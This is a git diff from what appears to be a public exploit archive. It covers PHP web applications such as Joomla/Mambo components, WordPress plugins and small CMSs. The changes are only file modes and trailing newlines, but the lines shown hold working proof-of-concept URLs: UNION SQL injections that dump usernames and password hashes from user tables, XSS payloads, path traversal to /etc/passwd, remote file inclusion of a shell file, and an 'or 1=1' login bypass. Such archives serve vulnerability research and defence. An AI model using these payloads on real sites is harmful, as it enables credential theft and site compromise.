-http://www.example.com/index.php?option=com_buslicense&sectionid=9999&Itemid=9999&task=list&aid=-1/**/union/**/select/**/0,username,0x3a,password,4,5,6,7,8,9,10,11,12,13,14/**/from/**/mos_users/* \ No newline at end of file +http://www.example.com/index.php?option=com_buslicense&sectionid=9999&Itemid=9999&task=list&aid=-1/**/union/**/select/**/0,username,0x3a,password,4,5,6,7,8,9,10,11,12,13,14/**/from/**/mos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31079.txt b/platforms/php/webapps/31079.txt old mode 100755 new mode 100644 index d3652d99e..30d1090d4 --- a/platforms/php/webapps/31079.txt +++ b/platforms/php/webapps/31079.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow webSPELL 4.01.02 is vulnerable; other versions may also be affected. -http://www.example.com/path/index.php?site=whoisonline&sort=">[xss code] \ No newline at end of file +http://www.example.com/path/index.php?site=whoisonline&sort=">[xss code] \ No newline at end of file diff --git a/platforms/php/webapps/31080.txt b/platforms/php/webapps/31080.txt old mode 100755 new mode 100644 index 6cf623ea2..8ed58b2ae --- a/platforms/php/webapps/31080.txt +++ b/platforms/php/webapps/31080.txt @@ -4,4 +4,4 @@ YeSiL KoRiDoR Ziyaretçi Defteri is prone to an SQL-injection vulnerability be Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/defter/index.php?sayfa=[sqL inj. code here ..] \ No newline at end of file +http://www.example.com/defter/index.php?sayfa=[sqL inj. code here ..] \ No newline at end of file diff --git a/platforms/php/webapps/31082.txt b/platforms/php/webapps/31082.txt old mode 100755 new mode 100644 index 366a80c5e..b5f203ff1 --- a/platforms/php/webapps/31082.txt +++ b/platforms/php/webapps/31082.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects Liferay Enterprise Portal 4.3.6. -User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)<<script>script>alert(&#039;XSS !!!&#039;)<</script>/script> \ No newline at end of file +User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)<<script>script>alert(&#039;XSS !!!&#039;)<</script>/script> \ No newline at end of file diff --git a/platforms/php/webapps/31083.txt b/platforms/php/webapps/31083.txt old mode 100755 new mode 100644 index f1b6d405b..68632c345 --- a/platforms/php/webapps/31083.txt +++ b/platforms/php/webapps/31083.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability using directory-traversal strings to This issue affects Nilson's Blogger 0.11; other versions may also be vulnerable. -http://www.example.com/comments.php?thispost=../../../../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/comments.php?thispost=../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/31084.txt b/platforms/php/webapps/31084.txt old mode 100755 new mode 100644 index 62b2d79d9..2c3e8d04f --- a/platforms/php/webapps/31084.txt +++ b/platforms/php/webapps/31084.txt @@ -4,4 +4,4 @@ Archimede Net 2000 is prone to an SQL-injection vulnerability because it fails t Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/telefonia/E-Guest_show.php?display=(sql) \ No newline at end of file +http://www.example.com/telefonia/E-Guest_show.php?display=(sql) \ No newline at end of file diff --git a/platforms/php/webapps/31085.txt b/platforms/php/webapps/31085.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31086.php b/platforms/php/webapps/31086.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3109.php b/platforms/php/webapps/3109.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31091.txt b/platforms/php/webapps/31091.txt old mode 100755 new mode 100644 index 4ff982362..dbb514003 --- a/platforms/php/webapps/31091.txt +++ b/platforms/php/webapps/31091.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Domain Trader 2.0 is vulnerable; prior versions may also be affected. -http://www.example.com/script/catalog.php?mode=viewcategory&id=<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/script/catalog.php?mode=viewcategory&id=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/31092.txt b/platforms/php/webapps/31092.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31093.txt b/platforms/php/webapps/31093.txt old mode 100755 new mode 100644 index 9cd26576c..fcefe8b85 --- a/platforms/php/webapps/31093.txt +++ b/platforms/php/webapps/31093.txt @@ -4,4 +4,4 @@ iTechClassifieds is prone to an input-validation vulnerability that may be explo A successful exploit may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/ViewCat.php?CatID=[SQL] \ No newline at end of file +http://www.example.com/ViewCat.php?CatID=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/31094.txt b/platforms/php/webapps/31094.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31096.txt b/platforms/php/webapps/31096.txt old mode 100755 new mode 100644 index 484cb4df8..af7aaeb88 --- a/platforms/php/webapps/31096.txt +++ b/platforms/php/webapps/31096.txt @@ -4,4 +4,4 @@ The ShiftThis Newsletter plugin for WordPress is prone to an SQL-injection vulne Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users \ No newline at end of file +http://www.example.com/wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users \ No newline at end of file diff --git a/platforms/php/webapps/31097.txt b/platforms/php/webapps/31097.txt old mode 100755 new mode 100644 index b1ce0c71a..8c020b09f --- a/platforms/php/webapps/31097.txt +++ b/platforms/php/webapps/31097.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow CruxCMS 3.0 is vulnerable; other versions may also be affected. -http://www.example.com/search.php?search="><script>alert(/vuln/)</script> \ No newline at end of file +http://www.example.com/search.php?search="><script>alert(/vuln/)</script> \ No newline at end of file diff --git a/platforms/php/webapps/31098.txt b/platforms/php/webapps/31098.txt old mode 100755 new mode 100644 index d81ca1c8f..a28158178 --- a/platforms/php/webapps/31098.txt +++ b/platforms/php/webapps/31098.txt @@ -14,4 +14,4 @@ username: admin' or 1=1/* password: something -will bypass the authentication process. \ No newline at end of file +will bypass the authentication process. \ No newline at end of file diff --git a/platforms/php/webapps/31099.txt b/platforms/php/webapps/31099.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31101.txt b/platforms/php/webapps/31101.txt old mode 100755 new mode 100644 index 9805bb139..0594dcbde --- a/platforms/php/webapps/31101.txt +++ b/platforms/php/webapps/31101.txt @@ -4,4 +4,4 @@ HispaH Youtube Clone is prone to a cross-site scripting vulnerability because th An attacker may leverage this issue to execute arbitrary script code in the context of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/youtube/siteadmin/editor_files/includes/load_message.php?lang[please_wait]=[XSS] \ No newline at end of file +http://www.example.com/youtube/siteadmin/editor_files/includes/load_message.php?lang[please_wait]=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31107.txt b/platforms/php/webapps/31107.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31108.txt b/platforms/php/webapps/31108.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31109.txt b/platforms/php/webapps/31109.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31110.txt b/platforms/php/webapps/31110.txt old mode 100755 new mode 100644 index 282c4c613..0007b36a2 --- a/platforms/php/webapps/31110.txt +++ b/platforms/php/webapps/31110.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow an attacker to compromise the application and These issues affect Portail Web Php 2.5.1.1; other versions may also be affected. -http://www.example.com/path/system/login.php?site_path=http://www.example2.com \ No newline at end of file +http://www.example.com/path/system/login.php?site_path=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/31111.txt b/platforms/php/webapps/31111.txt old mode 100755 new mode 100644 index 6d6e3abf3..3b5598511 --- a/platforms/php/webapps/31111.txt +++ b/platforms/php/webapps/31111.txt @@ -7,4 +7,4 @@ Exploiting these issues may allow an attacker to access potentially sensitive in These issues affect Download Management 1.00; other versions may also be vulnerable. http://example.com/infusions/download_management/infusion.php?settings[locale]=LFI%00 -http://example.com/infusions/download_management/download_management.php?settings[locale]=LFI%00 \ No newline at end of file +http://example.com/infusions/download_management/download_management.php?settings[locale]=LFI%00 \ No newline at end of file diff --git a/platforms/php/webapps/31112.txt b/platforms/php/webapps/31112.txt old mode 100755 new mode 100644 index 001079122..d1f535704 --- a/platforms/php/webapps/31112.txt +++ b/platforms/php/webapps/31112.txt @@ -12,4 +12,4 @@ E-xoops 1.0.8 (and earlier) with DevTracker v0.20 Other versions may also be vulnerable. http://www.example.com/modules/devtracker/index.php?proj_id=1&order_by=priority&direction=ASCquot;><script>alert()</script> -http://www.example.com/modules/devtracker/index.php?proj_id=1&order_by=priorityquot;><script>alert()</script>&direction=ASC \ No newline at end of file +http://www.example.com/modules/devtracker/index.php?proj_id=1&order_by=priorityquot;><script>alert()</script>&direction=ASC \ No newline at end of file diff --git a/platforms/php/webapps/31115.txt b/platforms/php/webapps/31115.txt old mode 100755 new mode 100644 index 77ce82058..5d5358e45 --- a/platforms/php/webapps/31115.txt +++ b/platforms/php/webapps/31115.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow MyNews 1.6.4 and prior versions are vulnerable. -http://www.example.com/index.php?hash="><iframe src=http://www.example2.com/ height=500px width=500px></iframe><!--&do=admin http://www.example.com/index.php?hash="><script>alert(1337);</script><!--&do=admin \ No newline at end of file +http://www.example.com/index.php?hash="><iframe src=http://www.example2.com/ height=500px width=500px></iframe><!--&do=admin http://www.example.com/index.php?hash="><script>alert(1337);</script><!--&do=admin \ No newline at end of file diff --git a/platforms/php/webapps/31116.txt b/platforms/php/webapps/31116.txt old mode 100755 new mode 100644 index 9c085ebf2..bb4642a1e --- a/platforms/php/webapps/31116.txt +++ b/platforms/php/webapps/31116.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Pagetool 1.0.7 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/index.php?name=pagetool_search&search_term=[XSS] \ No newline at end of file +http://www.example.com/[path]/index.php?name=pagetool_search&search_term=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31120.txt b/platforms/php/webapps/31120.txt old mode 100755 new mode 100644 index c5e8c13aa..bf7785979 --- a/platforms/php/webapps/31120.txt +++ b/platforms/php/webapps/31120.txt @@ -13,4 +13,4 @@ SRC="javascript:alert(&#039;DSecRG XSS&#039;) http://www.example.com/[installdir]/index.php?searched=modx&highlight="><IMG SRC="javascript:alert(&#039;DSecRG XSS&#039;) http://www.example.com/[installdir]/manager/index.php?a=&#039;<img -src="javascript:alert(&#039;DSecRG XSS&#039;)"> \ No newline at end of file +src="javascript:alert(&#039;DSecRG XSS&#039;)"> \ No newline at end of file diff --git a/platforms/php/webapps/31121.txt b/platforms/php/webapps/31121.txt old mode 100755 new mode 100644 index 6f9358c5e..b8fbcd28d --- a/platforms/php/webapps/31121.txt +++ b/platforms/php/webapps/31121.txt @@ -4,4 +4,4 @@ The Joomla! and Mambo 'com_sermon' component is prone to an SQL-injection vulner Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,password%2C0%2C0%2C0/**/from/**/mos_users/* \ No newline at end of file +http://www.example.com/index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,password%2C0%2C0%2C0/**/from/**/mos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31124.txt b/platforms/php/webapps/31124.txt old mode 100755 new mode 100644 index 9436c043a..9125200be --- a/platforms/php/webapps/31124.txt +++ b/platforms/php/webapps/31124.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Calimero.CMS 3.3 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?class=calimero_webpage&id="><script>alert(/vulnxss/)</script> \ No newline at end of file +http://www.example.com/index.php?class=calimero_webpage&id="><script>alert(/vulnxss/)</script> \ No newline at end of file diff --git a/platforms/php/webapps/31125.txt b/platforms/php/webapps/31125.txt old mode 100755 new mode 100644 index 45970ea59..74f53712c --- a/platforms/php/webapps/31125.txt +++ b/platforms/php/webapps/31125.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to include an arbitrary remote file containin Joovili 2.1 is vulnerable; other versions may also be affected. -http://www.example.com/members_help.php?hlp=http://www.example2.com/shell.txt? \ No newline at end of file +http://www.example.com/members_help.php?hlp=http://www.example2.com/shell.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31126.txt b/platforms/php/webapps/31126.txt old mode 100755 new mode 100644 index 91af9b62c..47be57c7d --- a/platforms/php/webapps/31126.txt +++ b/platforms/php/webapps/31126.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to steal cookie-based authenticati This issue affects Serendipity Freetag-plugin 2.95; prior versions may also be affected. -http://www.example.com/plugin/tag/%3Cdiv%20style=[XSS] \ No newline at end of file +http://www.example.com/plugin/tag/%3Cdiv%20style=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31129.txt b/platforms/php/webapps/31129.txt old mode 100755 new mode 100644 index 72e5e1cc0..5a7a46f01 --- a/platforms/php/webapps/31129.txt +++ b/platforms/php/webapps/31129.txt @@ -4,4 +4,4 @@ Managed Workplace Service Center is prone to an information-disclosure vulnerabi Attackers may exploit this issue to retrieve sensitive information that may aid in further attacks. -http://www.example.com/About/SC_About.htm \ No newline at end of file +http://www.example.com/About/SC_About.htm \ No newline at end of file diff --git a/platforms/php/webapps/3113.txt b/platforms/php/webapps/3113.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31131.txt b/platforms/php/webapps/31131.txt old mode 100755 new mode 100644 index 5b378cf32..5efa68a0d --- a/platforms/php/webapps/31131.txt +++ b/platforms/php/webapps/31131.txt @@ -8,4 +8,4 @@ These issues affect PKs Movie Database 3.0.3; other versions may also be affecte http://www.example.com/path/index.php?num=[SQL] http://www.example.com/path/index.php?category=[XSS] -http://www.example.com/path/index.php?num=9999999999&category=[XSS] \ No newline at end of file +http://www.example.com/path/index.php?num=9999999999&category=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31134.txt b/platforms/php/webapps/31134.txt old mode 100755 new mode 100644 index 06e8b8236..744890656 --- a/platforms/php/webapps/31134.txt +++ b/platforms/php/webapps/31134.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc VWar 1.5.0 is vulnerable; other versions may also be affected. -http://www.example.com/vwar/calendar.php?month=[SQL] \ No newline at end of file +http://www.example.com/vwar/calendar.php?month=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/31135.txt b/platforms/php/webapps/31135.txt old mode 100755 new mode 100644 index 34910d3a2..4bf14a997 --- a/platforms/php/webapps/31135.txt +++ b/platforms/php/webapps/31135.txt @@ -5,4 +5,4 @@ Rapid-Recipe is prone to multiple SQL-injection vulnerabilities because it fails Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_rapidrecipe&page=showuser&user_id=-1+union+all+select+concat(username,0x3a,password)+from+jos_users+limit+0,20-- -http://www.example.com/index.php?option=com_rapidrecipe&page=viewcategorysrecipes&category_id=-1+union+all+select+concat(username,0x3a,password),2+from+jos_users+limit+0,20-- \ No newline at end of file +http://www.example.com/index.php?option=com_rapidrecipe&page=viewcategorysrecipes&category_id=-1+union+all+select+concat(username,0x3a,password),2+from+jos_users+limit+0,20-- \ No newline at end of file diff --git a/platforms/php/webapps/31137.txt b/platforms/php/webapps/31137.txt old mode 100755 new mode 100644 index 63f1456cf..39d50290b --- a/platforms/php/webapps/31137.txt +++ b/platforms/php/webapps/31137.txt @@ -4,4 +4,4 @@ The Joomla! and Mambo 'com_comments' component is prone to an SQL-injection vuln Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSWORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+from+mos_content_comments+where+1=1 \ No newline at end of file +http://www.example.com/index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSWORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+from+mos_content_comments+where+1=1 \ No newline at end of file diff --git a/platforms/php/webapps/3114.txt b/platforms/php/webapps/3114.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31140.txt b/platforms/php/webapps/31140.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31141.txt b/platforms/php/webapps/31141.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31142.txt b/platforms/php/webapps/31142.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31143.txt b/platforms/php/webapps/31143.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31144.txt b/platforms/php/webapps/31144.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31145.txt b/platforms/php/webapps/31145.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31146.txt b/platforms/php/webapps/31146.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31147.txt b/platforms/php/webapps/31147.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31154.txt b/platforms/php/webapps/31154.txt old mode 100755 new mode 100644 index 879b871b0..96228078c --- a/platforms/php/webapps/31154.txt +++ b/platforms/php/webapps/31154.txt @@ -4,4 +4,4 @@ Counter Strike Portals is prone to an SQL-injection vulnerability because it fai Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?page=downloads&mode=details&id=-1/**/union/**/select/**/0,member_nick,111,member_pass,222,333,444,555,666/**/from/**/tbl_member/* \ No newline at end of file +http://www.example.com/index.php?page=downloads&mode=details&id=-1/**/union/**/select/**/0,member_nick,111,member_pass,222,333,444,555,666/**/from/**/tbl_member/* \ No newline at end of file diff --git a/platforms/php/webapps/31155.txt b/platforms/php/webapps/31155.txt old mode 100755 new mode 100644 index cf2cd1ccf..2ab5fd3ff --- a/platforms/php/webapps/31155.txt +++ b/platforms/php/webapps/31155.txt @@ -4,4 +4,4 @@ The Joomla! and Mambo 'com_iomezun' component is prone to an SQL-injection vulne Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_iomezun&task=edit&hidemainmenu=S@BUN&id=-1/**/union/**/select/**/null,null,null,username,password,null,null,null,null,null,null/**/from/**/jos_users/* \ No newline at end of file +http://www.example.com/index.php?option=com_iomezun&task=edit&hidemainmenu=S@BUN&id=-1/**/union/**/select/**/null,null,null,username,password,null,null,null,null,null,null/**/from/**/jos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31156.txt b/platforms/php/webapps/31156.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31157.txt b/platforms/php/webapps/31157.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31158.txt b/platforms/php/webapps/31158.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31159.txt b/platforms/php/webapps/31159.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3116.php b/platforms/php/webapps/3116.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31160.txt b/platforms/php/webapps/31160.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31161.txt b/platforms/php/webapps/31161.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31162.txt b/platforms/php/webapps/31162.txt old mode 100755 new mode 100644 index cbaf5d619..f94c3a9ee --- a/platforms/php/webapps/31162.txt +++ b/platforms/php/webapps/31162.txt @@ -4,4 +4,4 @@ source: http://www.securityfocus.com/bid/27755/info Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://ww.example.com/index.php?option=com_mezun&task=edit&hidemainmenu=S@BUN&id=-9999999/**/union/**/select/**/concat(username,0x3a,password),username,password,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a/**/from/**/jos_users/* \ No newline at end of file +http://ww.example.com/index.php?option=com_mezun&task=edit&hidemainmenu=S@BUN&id=-9999999/**/union/**/select/**/concat(username,0x3a,password),username,password,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a/**/from/**/jos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31164.txt b/platforms/php/webapps/31164.txt old mode 100755 new mode 100644 index 97708e440..dca76d5da --- a/platforms/php/webapps/31164.txt +++ b/platforms/php/webapps/31164.txt @@ -4,4 +4,4 @@ The Chess Club 'com_pcchess' component for Joomla! and Mambo is prone to an SQL- Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* \ No newline at end of file +http://www.example.com/index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/3117.txt b/platforms/php/webapps/3117.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31173.txt b/platforms/php/webapps/31173.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31174.txt b/platforms/php/webapps/31174.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31175.txt b/platforms/php/webapps/31175.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3118.txt b/platforms/php/webapps/3118.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31183.txt b/platforms/php/webapps/31183.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31192.txt b/platforms/php/webapps/31192.txt old mode 100755 new mode 100644 index 4ca28c3c3..2cf8cd132 --- a/platforms/php/webapps/31192.txt +++ b/platforms/php/webapps/31192.txt @@ -4,4 +4,4 @@ The Joomla! and Mambo 'com_model' component is prone to an SQL-injection vulnera Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_model&Itemid=0&task=pipa&act=2&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/* \ No newline at end of file +http://www.example.com/index.php?option=com_model&Itemid=0&task=pipa&act=2&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31193.txt b/platforms/php/webapps/31193.txt old mode 100755 new mode 100644 index 1798728df..b4b304c8b --- a/platforms/php/webapps/31193.txt +++ b/platforms/php/webapps/31193.txt @@ -5,4 +5,4 @@ The 'com_omnirealestate' component for Joomla! and Mambo is prone to an SQL-inje Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_omnirealestate&Itemid=0&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&resu -lts=S@BUN \ No newline at end of file +lts=S@BUN \ No newline at end of file diff --git a/platforms/php/webapps/31194.txt b/platforms/php/webapps/31194.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31195.txt b/platforms/php/webapps/31195.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31196.txt b/platforms/php/webapps/31196.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31197.txt b/platforms/php/webapps/31197.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31198.txt b/platforms/php/webapps/31198.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31199.txt b/platforms/php/webapps/31199.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3120.txt b/platforms/php/webapps/3120.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31200.txt b/platforms/php/webapps/31200.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31201.txt b/platforms/php/webapps/31201.txt old mode 100755 new mode 100644 index 9d9a5c02b..a933464ef --- a/platforms/php/webapps/31201.txt +++ b/platforms/php/webapps/31201.txt @@ -5,4 +5,4 @@ artmedic webdesign weblog is prone to multiple local file-include vulnerabilitie Exploiting these issues may allow an attacker to access potentially sensitive information and execute arbitrary local scripts in the context of the affected application. http://www.example.com/artmedic_weblog/index.php?ta=../../../../../../../../../../etc/passwd%00 -http://www.example.com/artmedic_weblog/artmedic_print.php?date=../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/artmedic_weblog/artmedic_print.php?date=../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/31202.txt b/platforms/php/webapps/31202.txt old mode 100755 new mode 100644 index 9c791d8c4..378bb1fb9 --- a/platforms/php/webapps/31202.txt +++ b/platforms/php/webapps/31202.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability using directory-traversal strings to This issue affects PlutoStatus Locator 1.0pre alpha; other versions may also be affected. -http://www.example.com/locator/index.php?page=../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/locator/index.php?page=../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/31206.txt b/platforms/php/webapps/31206.txt old mode 100755 new mode 100644 index 40fad897d..f519b1e5b --- a/platforms/php/webapps/31206.txt +++ b/platforms/php/webapps/31206.txt @@ -4,4 +4,4 @@ The Joomla! and Mambo 'com_smslist' component is prone to an SQL-injection vulne Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_smslist&Itemid=99999999&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/* \ No newline at end of file +http://www.example.com/index.php?option=com_smslist&Itemid=99999999&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31207.txt b/platforms/php/webapps/31207.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31208.txt b/platforms/php/webapps/31208.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31209.txt b/platforms/php/webapps/31209.txt old mode 100755 new mode 100644 index 55e27b2c9..26cdbe4e1 --- a/platforms/php/webapps/31209.txt +++ b/platforms/php/webapps/31209.txt @@ -4,4 +4,4 @@ The Joomla! and Mambo 'faq' component is prone to an SQL-injection vulnerability Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=faq&task=viewallfaq&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password),0x3a,0/**/from/**/mos_users/* \ No newline at end of file +http://www.example.com/index.php?option=faq&task=viewallfaq&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password),0x3a,0/**/from/**/mos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/3121.txt b/platforms/php/webapps/3121.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31210.txt b/platforms/php/webapps/31210.txt old mode 100755 new mode 100644 index 422dd2aec..bf5d10273 --- a/platforms/php/webapps/31210.txt +++ b/platforms/php/webapps/31210.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc This issue affects Simple Forum 1.10 and 1.11; other versions may also be affected. -http://www.example.com/forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/* \ No newline at end of file +http://www.example.com/forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31211.txt b/platforms/php/webapps/31211.txt old mode 100755 new mode 100644 index 6008a79a4..9f8641e22 --- a/platforms/php/webapps/31211.txt +++ b/platforms/php/webapps/31211.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc This issue affects Simple Forum 1.7 and 1.9; other versions may also be affected. -http://www.example.com/index.php?pagename=sf-forum&forum=-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),111,222,333,444,555/**/FROM/**/wp_users/* \ No newline at end of file +http://www.example.com/index.php?pagename=sf-forum&forum=-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),111,222,333,444,555/**/FROM/**/wp_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31212.txt b/platforms/php/webapps/31212.txt old mode 100755 new mode 100644 index 4a310c6a0..07310d90c --- a/platforms/php/webapps/31212.txt +++ b/platforms/php/webapps/31212.txt @@ -4,4 +4,4 @@ Simple Forum is prone to an SQL-injection vulnerability because it fails to suff Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 